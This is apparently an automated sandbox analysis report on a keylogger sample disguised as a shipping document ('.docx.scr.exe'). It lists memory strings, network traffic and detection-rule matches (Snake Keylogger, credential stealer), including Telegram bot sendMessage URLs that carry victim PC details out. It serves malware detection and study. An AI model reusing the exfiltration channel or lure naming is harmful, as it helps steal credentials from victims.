                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003375000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003366000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4525db8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.449e798.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe.4417178.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 1376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_027F3E280_2_027F3E28
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_027FE1040_2_027FE104
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_027F6F900_2_027F6F90
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C374480_2_05C37448
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C374580_2_05C37458
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_05C37A080_2_05C37A08
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774DDF00_2_0774DDF0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_077465C00_2_077465C0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774F4180_2_0774F418
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_07747CAA0_2_07747CAA
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_07748B280_2_07748B28
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E3E80_2_0774E3E8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_077477080_2_07747708
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E7E00_2_0774E7E0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E7D00_2_0774E7D0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774AE180_2_0774AE18
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774AE080_2_0774AE08
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774654D0_2_0774654D
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_077465210_2_07746521
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774DDE20_2_0774DDE2
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774AC100_2_0774AC10
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774AC010_2_0774AC01
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774F4080_2_0774F408
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E3D80_2_0774E3D8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774EB900_2_0774EB90
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_077472710_2_07747271
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_07745A600_2_07745A60
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_07748A100_2_07748A10
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_07749A080_2_07749A08
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774B2870_2_0774B287
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_077499F90_2_077499F9
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774B0A80_2_0774B0A8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E0A80_2_0774E0A8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774E0980_2_0774E098
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_0774B0990_2_0774B099
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A05F00_2_079A05F0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A00400_2_079A0040
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A96500_2_079A9650
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A96600_2_079A9660
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A75B00_2_079A75B0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A05E00_2_079A05E0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A92190_2_079A9219
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A92280_2_079A9228
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A00060_2_079A0006
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A8DF00_2_079A8DF0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A2C570_2_079A2C57
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A8B800_2_079A8B80
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 0_2_079A79E80_2_079A79E8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FED2783_2_02FED278
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE53623_2_02FE5362
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEA0883_2_02FEA088
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEC19F3_2_02FEC19F
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE71183_2_02FE7118
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEC7383_2_02FEC738
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEC4683_2_02FEC468
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FECA083_2_02FECA08
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE69B03_2_02FE69B0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEE9883_2_02FEE988
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE3E093_2_02FE3E09
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FECFAB3_2_02FECFAB
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FECCD83_2_02FECCD8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE3AA13_2_02FE3AA1
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE29EC3_2_02FE29EC
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FE39ED3_2_02FE39ED
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_02FEE97B3_2_02FEE97B
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F874B03_2_06F874B0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F843183_2_06F84318
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8C0A03_2_06F8C0A0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F84E003_2_06F84E00
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F82FC83_2_06F82FC8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F83C383_2_06F83C38
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8B9D03_2_06F8B9D0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8B7B03_2_06F8B7B0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F824C83_2_06F824C8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F874A03_2_06F874A0
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8F5803_2_06F8F580
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F843083_2_06F84308
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8B0283_2_06F8B028
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8B0193_2_06F8B019
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8F1283_2_06F8F128
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F82FB83_2_06F82FB8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F83C273_2_06F83C27
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8F9D83_2_06F8F9D8
                Source: C:\Users\user\Desktop\HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeCode function: 3_2_06F8F9C83_2_06F8F9C8
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1727712937.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735033280.0000000006F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                Source: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000000.1699675775.00000000005C0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIecr.exe: vs HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
